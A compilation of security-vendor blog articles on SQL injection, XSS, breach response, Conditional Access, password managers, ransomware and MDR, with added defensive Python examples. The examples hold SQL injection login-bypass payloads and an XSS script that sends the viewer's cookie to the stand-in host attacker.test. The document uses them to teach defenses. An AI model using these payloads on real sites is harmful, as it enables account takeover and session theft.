SQL injection remains a common issue with database-driven websites. It occurs when input controlled by the attacker (for example the content of a login form field or a URL parameter) is concatenated into a SQL query, so that part of the input is executed as SQL rather than treated as data.

A successful SQL injection attack can allow the perpetrator to read information from the database, insert, update, or delete data, execute administrative operations, read files on the database server, and in some configurations run operating-system commands.

To protect your organization from SQL injection, use parameterized queries (prepared statements) for every database call so input can never change the structure of the query, validate input against what the application expects, and apply the least-privilege model to database accounts so that even a successful injection can read or change as little as possible.
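The vulnerable query beside its parameterized fix, as an added example that is not code from the original page. It uses an in-memory SQLite database with constructed rows; the stored “hashes” are placeholder strings, since the point here is the query construction, not password storage.

```python
"""SQL injection: a string-built query beside its parameterized fix.

Added example, not code from the original page. Uses an in-memory SQLite
database with constructed rows; the password_hash values are placeholders.
"""
import sqlite3


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
                 "password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
                     [("admin", "hash-of-admin-password", "admin"),
                      ("alice", "hash-of-alice-password", "user")])
    return conn


def login_vulnerable(conn, username: str, password_hash: str):
    """Concatenates user input into the statement. The input is parsed as SQL,
    so a quote in the username ends the literal and the rest becomes code."""
    query = (f"SELECT username, role FROM users WHERE username = '{username}' "
             f"AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username: str, password_hash: str):
    """Parameterized query: the driver sends the statement and the values
    separately, so the input can only ever be data, never query structure."""
    return conn.execute("SELECT username, role FROM users WHERE username = ? AND password_hash = ?",
                        (username, password_hash)).fetchall()


def demo() -> dict:
    conn = setup_db()
    # Payload 1: closes the string literal, then comments out the password check.
    injected_user = "admin' --"
    # Payload 2: a tautology in the password field that matches every row.
    tautology = "' OR '1'='1"
    return {
        "vulnerable_comment": login_vulnerable(conn, injected_user, "wrong"),
        "vulnerable_tautology": login_vulnerable(conn, "x", tautology),
        "safe_comment": login_safe(conn, injected_user, "wrong"),
        "safe_tautology": login_safe(conn, "x", tautology),
        "safe_legit": login_safe(conn, "alice", "hash-of-alice-password"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the first payload the vulnerable query becomes `... WHERE username = 'admin' --' AND password_hash = 'wrong'`, and everything after `--` is a comment, so the attacker is logged in as admin with no password at all. The parameterized version receives the identical strings and returns no rows, because `admin' --` is compared as a literal username. Least-privilege database accounts, the advice in the text, limit what a successful injection can do (a read-only account cannot drop tables), but only parameterization prevents the injection itself.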

Cross-site scripting (XSS) attacks

XSS attacks run attacker-supplied scripts in the victim’s browser in the context of a trusted site. In the stored variant, the attacker submits malicious JavaScript through a form and it is saved in the website’s database; when a victim later loads the page, the server sends the attacker’s payload as part of the HTML to the victim’s browser, which executes it as if it were the site’s own code. In the reflected variant, the payload is carried in a crafted link and echoed straight back by the server. Either way, the script can send the victim’s session cookie to the attacker’s server, who uses it for session hijacking, or perform actions in the victim’s name.

To defend against XSS, treat anything that originates outside your system as untrusted. Encode output for the context in which it is rendered (HTML body, attribute, JavaScript, URL), validate input against an allowlist of known, acceptable values, set session cookies with the HttpOnly flag so scripts cannot read them, and consider a Content Security Policy to limit where scripts may load from.
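The stored XSS scenario and its defenses, as an added example that is not code from the original page. The comment payload and the attacker domain (attacker.test) are constructed; the rendering functions stand in for whatever template code a real site uses.

```python
"""Stored XSS: rendering untrusted text into HTML without and with escaping.

Added example, not code from the original page. The payload and the
attacker domain (attacker.test) are constructed; the rendering functions
stand in for a site's template code.
"""
import html
import re
from urllib.parse import urlparse

# Allowlist for a username: letters, digits and a few separators, 1-32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

# What the attacker stores in the comments table: exfiltrates the viewer's cookie.
PAYLOAD = "<script>fetch('https://attacker.test/c?' + document.cookie)</script>"


def render_comment_vulnerable(author: str, text: str) -> str:
    """Interpolates stored data straight into the page. The browser cannot tell
    the attacker's <script> from the site's own markup, so it runs it."""
    return f"<p><b>{author}</b>: {text}</p>"


def render_comment_safe(author: str, text: str) -> str:
    """Output encoding for the HTML text context: <, >, &, and quotes become
    entities, so the payload is displayed as text instead of parsed as markup."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


def validate_username(name: str) -> bool:
    """Input validation by allowlist: reject anything outside the known-good set.
    This complements output encoding; it does not replace it."""
    return bool(USERNAME_RE.fullmatch(name))


def safe_href(url: str):
    """Escaping is context-specific. Inside an href, entity-escaping does not
    neutralise a javascript: URL, so the scheme itself must be allowlisted.
    Returns an attribute-safe value, or None if the URL is rejected."""
    parsed = urlparse(url.strip())
    if parsed.scheme.lower() not in ("http", "https"):
        return None
    return html.escape(url, quote=True)


def demo() -> dict:
    return {
        "vulnerable": render_comment_vulnerable("mallory", PAYLOAD),
        "safe": render_comment_safe("mallory", PAYLOAD),
        "username_ok": validate_username("alice_01"),
        "username_bad": validate_username("alice<script>"),
        "href_js": safe_href("javascript:alert(document.cookie)"),
        "href_ok": safe_href("https://www.example.com/profile?u=alice&tab=1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `safe_href` function is there because the most common XSS mistake after “forgot to escape” is “escaped for the wrong context”: `html.escape` makes the payload harmless between tags, but a `javascript:` URL contains no characters that escaping touches, so in an `href` the scheme has to be checked instead.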

Malware attacks

Malicious software can be described as unwanted software that is installed within the victim’s information system. There are many types of malware that hackers use such as: macro viruses, file infectors, polymorphic viruses, trojans, etc.


A good defense requires understanding the offense. Unfortunately, attackers have many options, such as DDoS assaults, malware infections, and brute-force password attacks trying to gain unauthorized access to business data.

Measures to mitigate these threats vary, but IT security basics stay the same. So, keep your systems and anti-virus databases up to date, regularly train your employees, configure your firewall to allow only the specific ports and hosts you need, keep your passwords unique and strong, use a least-privilege model in your IT environment, make regular backups, and continuously audit your IT systems for suspicious activity.

What To Do After A Data Breach?

All organizations face the risk of a data breach because of a cyberattack or another type of security incident. Recovering from such an incident could be complicated, no matter how big or small your company is, especially if sensitive data is exposed.

How To Respond To A Data Breach?

If your business is the victim of a data breach and you are wondering how to react efficiently, consider the following steps to help minimize the impact.

Contain The Security Breach

Some people might be tempted to delete as many files as possible after a data breach occurs, but preserving evidence is crucial to assess how the breach occurred to prevent it from happening again.

Firstly, try to determine which servers, applications, and/or devices have been compromised and contain them as quickly as possible to ensure that the attack does not spread and damage more assets.

To stop an attack from spreading within your network, isolate the affected systems from the rest of the network as quickly as possible, by disconnecting them or moving them to a quarantine segment. Avoid powering them off if you can, since memory may hold evidence your investigators need; if the compromise is widespread, taking the whole network offline may be the only safe option.

Change the credentials for all your critical accounts and servers.

If your IT staff is not specialized in digital forensics you may want to hire a specialist to conduct the investigation.

Assess the Security Breach

You need to determine the root cause of the breach within your system to help prevent the same kind of attack from happening again.

If you have discovered that you are a victim of a broader attack that targeted multiple organizations, follow updates from authorities charged with monitoring the situation and report accordingly.

Key Aspects:

You need to identify who had access to the compromised servers, which network connections were active when the breach occurred, and how the attack was initiated.

You may be able to pinpoint how the attack vector penetrated your system by checking your firewall logs, your antivirus program, the email service, or your Intrusion Detection System.

You also need to find out who may have been affected by the breach, including employees, customers, and third-party vendors.

Assess how severe the data breach was by identifying what information was targeted, such as mailing addresses, specific accounts, credit/debit card numbers, etc.

Data Breach Notification Plan

Communicate with your staff and let them know what happened. Define clear authorizations for team members to report on the issue both internally and externally. Remaining on the same page with your team is paramount while your business is recovering from a security incident.

You may need to consult with your legal team to figure out the best way to avoid a legal hassle.

If you don’t have a cybersecurity plan in place or an IT security team to handle such situations, StratusPointIT professionals can help you defend against and recover from IT security incidents.

Key Aspects:

Notify your cyber insurance provider.

When a cyber event occurs, your insurance company may have experts who will walk you through the proper response steps. Contact your insurer as quickly as possible to limit the consequences of such an attack and for planning the next steps.

Notify your customers.

Communication is key to maintaining a positive, professional relationship with your customers. Provide them with means to specifically ask questions related to the breach.

Your employees should be aware of your organization’s policies regarding data breaches. Also, consider restricting your employees’ access to sensitive data based on their job roles and regularly train them about how to prepare for a data breach and how to avoid one.

Prevention Methods

The FBI has provided additional tips that can help businesses protect themselves against cyber incidents.

Never download attachments or click links within emails received from senders you do not recognize.

Do not provide usernames, passwords, social security numbers, financial data, or other personal information in response to an email or phone call.

Avoid using the same password for multiple accounts.

Your organization must evaluate the technologies in place and invest in more up-to-date solutions to ensure best protection.

Make sure you review and update information security policies, business continuity plans, and data breach response plans.

Also, conduct frequent security checks to help reduce the likelihood of a similar incident occurring again in the future and educate your staff about data breach protocols.

A data breach can be undoubtedly stressful, but if you take the necessary steps, it can make your business better prepared next time a similar incident occurs.

How to create an incident response plan?

An incident response plan is a well-documented plan that includes a series of phases that helps IT security professionals recognize and properly react to cybersecurity incidents.

According to Gartner, the SANS Institute (founded 1989) is one of the world’s premier cybersecurity training organizations. The SANS Institute methodology includes 6 incident response phases as follows: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.

Within each phase, there are specific areas that should be considered. Next, we will analyze each phase and identify the items that need to be addressed.

The Preparation Phase

This phase is all about ensuring your employees are properly trained regarding their incident response roles and responsibilities in the unfortunate event of a data breach.

Make sure all aspects of your incident response plan (security training, hardware, software resources, etc.) are approved and funded in advance.

Thoroughly explain and document everyone’s roles and responsibilities. This phase must be tested to assure that your employees will perform as they were trained. The more prepared your employees are, the less likely they will make critical mistakes.

Make sure that everyone has been trained on security policies, that your incident response team know their roles and have participated in mock drills.

This is also a good time to update and patch your systems, review your remote access protocols, change all user and administrative access credentials, and harden all passwords.

The Identification Phase

During this phase the security team will determine whether your organization systems have been breached. A cybersecurity incident could originate from many different areas.

Briefly, you will record how and when the incident was discovered and who discovered it. You will then follow the necessary steps to identify the attack vector and its point of entry, and assess how the incident affects your operations.

The Containment Phase

When a breach is first discovered, people are usually tempted to securely delete everything so they can just get rid of it. This approach will likely hurt the organization in the long run because you will be destroying valuable evidence that your IT security team will need to determine where the breach started and create a plan to prevent it from happening again.

Instead, contain the breach: isolate the affected systems and quarantine the malware you have identified so it does not spread and cause further damage to your business. If you can, disconnect affected devices from the network rather than powering them off, so that evidence held in memory is preserved.

Have short-term and long-term containment strategies in place. Keeping up-to-date backups is essential to restore your business operations.

The Eradication Phase

Once you have contained the issue, you need to find and eliminate the root cause of the breach. This means all malware should be securely removed, systems should again be patched, and updates should be applied.

Whether you do this in-house, or hire a third party to handle it, you need to be thorough. If any piece of malware or security vulnerabilities remain in your systems, you may still be losing valuable data, and the liability will only increase.

The Recovery Phase

This is the process of restoring the affected systems back to a pre-attack version. During this time, it is important to get your systems, devices, and business operations up and running again.

Monitor the restored systems closely, especially those that were previously affected, to make sure the attackers do not regain access, and update your security incident response plan with what you have learned.

Lessons Learned

Once the assessment is complete, gather all incident response team members and discuss what you have learned from the security incident. At this point you will analyze and document everything about the breach.

Documentation may be used for data breach insurance. This can save the company from prospective legal costs and fines, not to mention the brand damage associated with a data breach which can be harsh for a business, especially if the organization is a startup.

Identify what worked well in your response plan, what changes need to be applied, what weakness did the breach exploit, etc. All the lessons you learn are valuable and will strengthen your organization against future cyberattacks.

No one wants to go through a security incident, but it is essential to prepare for one. Know what to do when it happens and regularly test your plan’s efficiency. For this purpose, regularly orchestrate cyberattacks to test your organization’s incident response plan and how fast your team reacts. This habit will generate at least two important results: a deep understanding of your plan (tasks, processes) and a list of gaps that should be addressed. If there is room for improvement, all changes must be properly documented for them to have real, lasting value for your security operations team.

Azure Active Directory Conditional Access Policies

What is Conditional Access?

Azure Active Directory Conditional Access is a feature that helps businesses improve both cybersecurity and compliance. By applying such policies, organizations will refine the authentication process reducing the risk of unauthorized access.

Usually, it is the legitimate account owner typing in the username and password pair. Once logged in, the user can access all the data, applications, and business resources he/she has been granted permissions for. But sometimes, it is an attacker who tries to log in with the user’s credentials, putting your organization at risk.

To reduce this risk, organizations can put additional authentication measures in place, such as multi-factor authentication (MFA) requiring the user to type the unique code sent to their mobile device, a fingerprint, etc.

This strategy is effective. Microsoft reports that 99.9% of account compromise attacks against organizations could be stopped simply by using MFA. However, MFA alone can be insufficient in some cases, such as a privileged administrator accessing highly sensitive resources. In such a case, additional evidence that the authentication request is legitimate is recommended.

The Conditional Access feature helps organizations strengthen the authentication protocol. For instance, you can create a policy that requires only administrators, and not regular users, to complete the MFA step.

You can utilize variables like the user’s location and the type of authentication protocol being used. For instance, you can block all requests that come from certain countries, allow all requests from your headquarters location, and require MFA for all the rest.

Conditional Access Policies

When creating Conditional Access policies there are several basic actions you should take, such as:

  • Verify the user’s identity during sign-in.
  • Verify the security of the device used for the connection.
  • Require MFA for users, including all administrators.
  • Implement geo-blocking.
  • Disable legacy protocols that don’t support MFA (POP, IMAP, SMTP, ActiveSync).

Improving MFA

While multi-factor authentication contributes to a more secure account, burdening users with MFA challenges is not always the best approach. If users are required to go through MFA requests each time they sign in, they can fall into the habit of approving challenges without verifying the legitimacy of each request. Unfortunately, this could mean that someone accidentally accepts a sign-in request generated by a hacker. Therefore, user experience is extremely important when implementing Conditional Access policies.

So, instead of challenging a user with MFA at each login, create a strategy that combines signals to verify the identity of the user, such as the user’s known location. Using multiple signals before requesting MFA drastically reduces the number of prompts the user receives.
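As an added example (not Microsoft's code or API), the following Python sketch models how the policies described above combine: each policy is a set of conditions plus a control, the strictest control that applies wins, and a request matching no policy (the headquarters case) is simply allowed. Policy names, the blocked country codes and the sign-in fields are assumed values; the block also measures how many sign-ins would see an MFA prompt under a combined policy set versus prompting everyone, which is the point of the previous paragraph.

```python
from dataclasses import dataclass, field

# Outcomes ordered by strictness: when several policies apply, the most
# restrictive control wins (block > require MFA > allow).
BLOCK, REQUIRE_MFA, ALLOW = "block", "require_mfa", "allow"
SEVERITY = {BLOCK: 2, REQUIRE_MFA: 1, ALLOW: 0}

# Protocols that cannot complete an MFA challenge (the list from the page).
LEGACY_PROTOCOLS = {"POP", "IMAP", "SMTP", "ActiveSync"}


@dataclass
class SignIn:
    user: str
    is_admin: bool
    country: str            # country of the sign-in IP (constructed values below)
    named_location: str     # "HQ" when the request comes from the office network
    protocol: str           # "modern" or one of LEGACY_PROTOCOLS
    device_compliant: bool  # device passed the organization's compliance check


@dataclass
class Policy:
    name: str
    decision: str
    conditions: list = field(default_factory=list)  # predicates over a SignIn

    def matches(self, s: SignIn) -> bool:
        return all(cond(s) for cond in self.conditions)  # no conditions: always


# Constructed policy set; names and the blocked country codes are hypothetical.
BLOCKED_COUNTRIES = {"XX", "YY"}
POLICIES = [
    Policy("Block legacy auth", BLOCK, [lambda s: s.protocol in LEGACY_PROTOCOLS]),
    Policy("Geo-block", BLOCK, [lambda s: s.country in BLOCKED_COUNTRIES]),
    Policy("Admins always MFA", REQUIRE_MFA, [lambda s: s.is_admin]),
    Policy("MFA outside HQ", REQUIRE_MFA, [lambda s: s.named_location != "HQ"]),
    Policy("MFA on non-compliant device", REQUIRE_MFA,
           [lambda s: not s.device_compliant]),
]
# The blunt alternative the text warns against: an MFA prompt on every sign-in.
PROMPT_EVERYONE = [Policy("MFA for everyone", REQUIRE_MFA, [])]


def evaluate(sign_in: SignIn, policies=POLICIES):
    """Return (decision, names of the policies that applied).

    A sign-in matching no policy is allowed: that is the "allow all
    requests from your headquarters location" case.
    """
    decision, applied = ALLOW, []
    for policy in policies:
        if policy.matches(sign_in):
            applied.append(policy.name)
            if SEVERITY[policy.decision] > SEVERITY[decision]:
                decision = policy.decision
    return decision, applied


def mfa_prompt_rate(sign_ins, policies=POLICIES) -> float:
    """Fraction of sign-ins that would receive an MFA prompt under a policy set."""
    prompted = sum(evaluate(s, policies)[0] == REQUIRE_MFA for s in sign_ins)
    return prompted / len(sign_ins)
```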

Business Data Protection

Conditional Access supports many features besides multi-factor authentication. Some organizations ignore the fact that anybody can install Outlook or OneDrive on a personal device, and then copy mailbox and data to that device. So, when an employee leaves, the company has no control over any data copied to these personal devices. Ensuring that users can copy business data only to company devices is crucial for compliance and security purposes.

Less is More

When the organization wants to change a policy, or the responsible team needs to investigate a sign-in, a high number of Conditional Access policies can make the task very challenging. Therefore, you should think about the bigger picture from the beginning of this process and combine as many conditions as possible into one policy.

Try to group policies based on different signals, such as: the type of data, type of user, and the ownership of the device.

When it comes to type of data, access to SharePoint should be stricter compared to Microsoft To-Do, which does not contain as much sensitive data.

Based on the type of user, administrator accounts need stricter policies than regular users.

The ownership of the device is very important because there is a big difference between the management of personal and corporate devices. Personal devices should not be trusted with as much data as corporate devices. The latter category usually has adequate security controls in place.

Documentation is Necessary

As the number of active policies increases, documentation becomes important. It should include details of the configuration and a description of each policy. This will help you revert the policy to the original state and remind you why it was implemented in the first place. While this might not be necessary for smaller organizations, it is mandatory for enterprises.

Besides documenting policies, be sure to document exclusions: not just which exclusions are active but, more importantly, who added them and why. This way you can review the exclusions and decide whether they are still useful.

In addition to implementing multi-factor authentication in an intuitive way, Conditional Access policies can limit what files users can access or download, in certain scenarios, improving the security of your organization.

Benefits Of Using A Password Manager

We all want our sensitive data to be protected, yet many users rely on weak passwords because memorizing complex passwords is painful. This approach is dangerous.

Unless you want to constantly safeguard a hard copy list of all your passwords, you should consider setting up a password manager. Such a solution can help you easily oversee and handle all your login credentials for any online account and maintain proper password security.

These solutions are also very handy when it comes to auto filling fields and syncing your data across PCs, Macs, iPhones, Android-powered devices, etc.

What is a Password Manager?

A password manager is basically an encrypted vault that securely stores login information used to access applications and accounts. Besides keeping your identity, credentials, and sensitive data safe, some password managers utilize a password generator to create strong, unique passwords every time. All passwords are stored in an encrypted database and locked behind a master password.

With all the recent cyber incidents, having a unique password for each account you use means that if one gets hacked, your stolen password can’t be used on other accounts. In effect, using a different password everywhere is a security control of its own.

A 2017 report from LastPass found that people had to remember 191 different passwords, on average, just related to their work.

While technology usually makes our lives easier, every new website and application we sign up for means another password to remember. It is almost impossible to remember all of them. A 2021 LastPass survey reveals that 80% of respondents were concerned about changing passwords frequently, but 48% of them stated that they won’t change their password unless it is required.

By using large lists of stolen passwords bought off the dark web, hackers can brute force their way into other websites or use old passwords to extort users. According to the 2019 Verizon Data Breach Investigations Report, 80% of data breaches are caused by compromised, weak, or reused passwords.
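An added illustration of the vault described above, not any product's code: the master password is stretched with PBKDF2 (hashlib), the entries are protected with encrypt-then-MAC, and the generator draws from the OS CSPRNG. Because the standard library has no AES, the keystream below is HMAC-SHA256 in counter mode, a stand-in for the AES-GCM or ChaCha20-Poly1305 a real vault would use; the reuse audit at the end shows why one password per account matters.

```python
import hashlib
import hmac
import json
import secrets
import string

PBKDF2_ITERATIONS = 600_000  # slows offline guessing of the master password
KEY_LEN = 32
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def derive_keys(master_password: str, salt: bytes):
    """Stretch the master password into separate encryption and MAC keys."""
    km = hashlib.pbkdf2_hmac("sha256", master_password.encode(), salt,
                             PBKDF2_ITERATIONS, 2 * KEY_LEN)
    return km[:KEY_LEN], km[KEY_LEN:]


def _keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR data with an HMAC-SHA256 counter-mode keystream.

    Stand-in for a real cipher: the standard library has no AES, so a
    production vault would use AES-GCM or ChaCha20-Poly1305 instead.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hmac.new(key, nonce + offset.to_bytes(8, "big"), "sha256").digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], block))
    return bytes(out)


def seal(master_password: str, entries: dict) -> bytes:
    """Encrypt-then-MAC the vault; output is salt || nonce || ciphertext || tag."""
    salt, nonce = secrets.token_bytes(16), secrets.token_bytes(16)
    enc_key, mac_key = derive_keys(master_password, salt)
    ct = _keystream_xor(enc_key, nonce, json.dumps(entries).encode())
    tag = hmac.new(mac_key, salt + nonce + ct, "sha256").digest()
    return salt + nonce + ct + tag


def open_vault(master_password: str, blob: bytes) -> dict:
    """Verify the tag before decrypting; a wrong master password fails here."""
    salt, nonce, ct, tag = blob[:16], blob[16:32], blob[32:-32], blob[-32:]
    enc_key, mac_key = derive_keys(master_password, salt)
    expected = hmac.new(mac_key, salt + nonce + ct, "sha256").digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("vault integrity check failed: wrong password or tampering")
    return json.loads(_keystream_xor(enc_key, nonce, ct))


def generate_password(length: int = 20) -> str:
    """Unique, random password from the OS CSPRNG (never the random module)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def audit_reuse(entries: dict) -> dict:
    """Map each password shared by several sites to those sites."""
    by_password = {}
    for site, cred in entries.items():
        by_password.setdefault(cred["password"], []).append(site)
    return {pw: sites for pw, sites in by_password.items() if len(sites) > 1}
```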

What are the benefits of using a password manager?

Firstly, you don’t have to remember all those passwords. A password manager can securely keep them for you. Once your usernames and passwords have been entered into the vault, your master password is the only one you must remember. Entering the master password unlocks the vault, so you can then retrieve whatever password you need. Add more security to your vault by enabling two-factor authentication. A strong master password combined with a two-step verification protocol provides the most protection.

If you choose a cloud-based password manager, then you can access your password vault from any device, anywhere.

Some password managers can securely keep more than username/password pairs. Sensitive information such as shipping addresses and credit card information can be protected too. With just one master password or a fingerprint, the user can access them and autofill web forms.

They can generate new passwords for you. Typically, you will be prompted to choose if you would like the password manager to create a password whenever you create a new account with a website or application.

They can alert you to a phishing site. Phishing emails are deceptive, as they look like they are coming from a legitimate sender. Links included within such emails send recipients to malicious websites designed to steal their sensitive data. Browser-based password managers will not auto-complete the username and password fields on such a site because they won’t recognize it as the one tied to the stored password, thereby protecting your data from a potential exploit.

Password managers save time. In addition to storing your passwords, some password managers also auto-fill credentials allowing you to quickly access your accounts.

There are password managers that can sync across different operating systems. For instance, if you are a Windows user at home and a Mac user at work, you will be able to quickly access your passwords regardless of which platform you are on.

Password managers help protect against identity theft. By using a unique password for every account, you are essentially improving the security of each account. If one of your accounts gets hacked, attackers won’t be able to get into any of the others.

Many robust password managers can assist in collaboration. This feature allows you to share passwords securely between employees or with external clients.

Types of password managers

Desktop-based password managers store passwords on your device (Mac, laptop, etc.) in an encrypted vault. Usually, the user cannot access those passwords from any other device.

Cloud-based password managers store encrypted passwords on the service provider’s network. The service provider is responsible for the security of your passwords. The main benefit of cloud-based password managers is that the user can access their password vault from any device that is connected to the Internet.

Protect your data like a professional and use a password manager to keep your credentials safe and secure.

How to mitigate the risk of a ransomware attack in 2022

As you probably know, malware is malicious software (a file or code) which can:

  • lock a device or make it unusable;
  • take control of certain devices to attack the organization;
  • steal, delete, or encrypt sensitive data.

Ransomware is a type of malware that prevents users from accessing their devices or certain files. Ransomware will often spread to other machines within the network, as happened with the WannaCry malware.

Usually, the victim is asked to contact the attacker via an anonymous email address or to follow instructions on an obscure web page in order to make a payment. The payment, demanded in exchange for unlocking the device or regaining access to the encrypted data, is usually requested in a cryptocurrency.

However, even if the ransom is paid, there is absolutely no guarantee that the user will get access to the device, or the files.

Sometimes, malware may look like ransomware, but after the ransom is paid the files may not be decrypted. For this reason, it is crucial to always keep offline backups of your most important files.

Organizations must proactively protect their assets against these complex cyberattacks. Strong defenses and a resilient cyber security posture require not only technical measures but also ransomware-relevant business continuity planning.

Here are a few aspects that should be considered in order to protect your organization and its assets.

Maintain multiple versions of files, not just basic backups.

Companies will need to utilize systems that can create snapshots several times a day or maintain multiple versions of files created over the course of the day, to enable a quick restoration to a specific point in time. In the unfortunate case of a cyberattack, this effort considerably minimizes the productivity loss. Also, IT security personnel will need to routinely test the backups to ensure the data is restorable and to determine the time it takes to restore. This way the organization can estimate the downtime it will have to handle in the case of a successful ransomware attack.
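As an added example (not from the original text), the following Python sketch keeps several time-stamped versions of each file, restores the newest one at or before a chosen moment, and runs the routine restore test the paragraph recommends against a known-good hash. File names, contents and timestamps are constructed sample data.

```python
import hashlib
from dataclasses import dataclass, field


def fingerprint(content: bytes) -> str:
    """SHA-256 hex digest used to prove a restored file is byte-for-byte intact."""
    return hashlib.sha256(content).hexdigest()


@dataclass
class Version:
    taken_at: int      # unix timestamp of the snapshot (constructed values in use)
    content: bytes
    sha256: str        # recorded at backup time, checked again at restore time


@dataclass
class VersionStore:
    """Several versions per file; a later snapshot never overwrites an earlier one."""
    versions: dict = field(default_factory=dict)  # path -> [Version], time-sorted

    def snapshot(self, path: str, content: bytes, taken_at: int) -> None:
        history = self.versions.setdefault(path, [])
        history.append(Version(taken_at, content, fingerprint(content)))
        history.sort(key=lambda v: v.taken_at)

    def restore(self, path: str, point_in_time: int) -> bytes:
        """Newest version taken at or before point_in_time, integrity-checked.

        Choosing a moment before the ransomware ran is what makes the
        multiple versions useful: the latest snapshot may already hold
        encrypted files.
        """
        older = [v for v in self.versions.get(path, []) if v.taken_at <= point_in_time]
        if not older:
            raise LookupError(f"no version of {path} at or before {point_in_time}")
        chosen = older[-1]
        if fingerprint(chosen.content) != chosen.sha256:
            raise ValueError(f"stored version of {path} is corrupt")
        return chosen.content


def restore_drill(store: VersionStore, path: str, point_in_time: int,
                  known_good_sha256: str) -> bool:
    """Routine restore test: does the backup actually yield the expected file?"""
    try:
        return fingerprint(store.restore(path, point_in_time)) == known_good_sha256
    except (LookupError, ValueError):
        return False
```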

Use the principle of least privilege.

Limiting the file access rights to the minimum level of permissions that users need to perform their work is extremely important. This measure will reduce the number of files that could be encrypted in the event of a ransomware attack.

Limit the risk of initial attack vectors.

Ransomware attackers need access to your system to damage it. They obtain access through phishing schemes, unpatched software, and employee password reuse. Organizations should aim to reduce the likelihood of ransomware attacks by implementing and maintaining strong vulnerability management programs, reducing their attack surface, and providing security training programs for all personnel.

Plan for an attack, even if you think it is unlikely.

Even though they were not the intended targets, there are numerous examples of companies that have been indirectly hit by malware.

Develop an internal and external communication strategy. It is important that the right information reaches the right recipients in a timely manner.

Determine how you will respond to the ransom demand and the threat of your organization’s data being published.

Ensure that your incident management plan and supporting resources are available in case your network is compromised.

Improve your incident management plan. This will help clarify the roles and responsibilities of staff and third parties and prioritize system recovery.

Use Endpoint Detection & Response (EDR)

Attacks are no longer limited to individual machines; they now try to lock down entire systems. Botnets and IoT networks can be used to amplify ransomware’s effects.

Modern antivirus solutions can identify and block new types of malware. However, hackers are constantly adapting their methods. Many types of malware are untraceable by standard solutions, such as polymorphic malware which is a type of malware that constantly changes its identifiable features to avoid detection, or fileless malware, etc.

Under these circumstances, to improve cybersecurity, an IT department should implement an integrated endpoint security solution. EDR security integrates the collection, correlation, and analysis of endpoint data, as well as alerting and responding to imminent threats.

Companies must be prepared for these increasingly sophisticated types of attacks. By hiring a professional team and taking the necessary steps, you will be able to protect your IT infrastructure from modern ransomware attacks.

Managed Detection and Response

A Managed Detection and Response (MDR) security solution is a 24/7/365 security service that covers a range of activities, including cloud-managed security, for organizations that cannot maintain their own security operations center (SOC). MDR services combine threat intelligence, advanced analytics, and human expertise in incident investigation and response, deployed at the host and network levels, to help keep your organization secure.

Relevant analytics, threat intelligence, and forensic data are passed to professional analysts, who classify alerts and determine the appropriate response to reduce the effects and risk of incidents. Then, through a combination of human abilities and machine capabilities, the threat is removed, and the affected endpoint is restored to its original state.

Though an Endpoint Detection and Response (EDR) solution provides you with the platform to investigate and remediate threats, it still requires human intervention. An MDR solution provides a certified team of cybersecurity professionals that handles monitoring, incident response and remediation to help keep your business secure. Endpoint detection and response is part of the tool set used by MDR providers.

EDR records and stores behaviors and events on endpoints and may trigger rules-based automated responses. When a suspicious situation is identified, it is sent to the IT security team for human investigation. EDR gives security teams the ability to use more than just indicators of compromise (IoCs) or signatures to understand what is happening within their networks.

Over time, the EDR tools have become more and more complex, incorporating modern technologies such as machine learning, behavioral analysis, and the ability to integrate with other complex solutions.

MDR Fundamentals

Managed Prioritization

Prioritization helps organizations that struggle daily with large volumes of alerts to determine which one should be addressed first. Managed prioritization, also known as “managed EDR”, applies a set of automated rules and human inspection to differentiate between false positives and true threats.

Threat Discovery

Behind every threat is a person who analyzes the options and decides how to avoid being caught by their targets’ countermeasures. While machines are increasingly smart, the human mind is still needed to add the missing element that no automated detection system can provide. Threat hunters with skills and expertise identify and alert on the most advanced threats in order to catch what the layers of automated protection can’t.

Managed Investigation

Managed investigation services help businesses understand threats faster by providing security alerts with additional context. Therefore, organizations can clearly understand what happened, when it happened, what was affected, and how far the attacker went. With that information at hand, they can plan and execute an effective response.

Guided Response

The guided response provides actionable advice on the best way to isolate and remediate a specific threat. Organizations are advised on activities such as whether to remove an endpoint from the network, how to eliminate a threat or recover from a cyberattack.

Recovery & Remediation

The last phase in incident response is remediation. This step is crucial as the organization’s reputation is at stake. Managed remediation will restore systems to their pre-attack state by removing malware, cleaning the registry, and removing any unauthorized access and persistence mechanisms. Also, during the remediation phase, the IT security personnel will ensure that further compromise is prevented.

In-house security teams may lack the resources and the time to fully utilize their EDR systems, which can leave an organization even less secure than it was before it implemented an EDR solution. MDR solves the problem by introducing human expertise, specific processes, and threat intelligence.

MDR is designed to help organizations acquire enterprise-grade protection while avoiding the costs of building and maintaining a security operations center or hiring enterprise-level security staff.
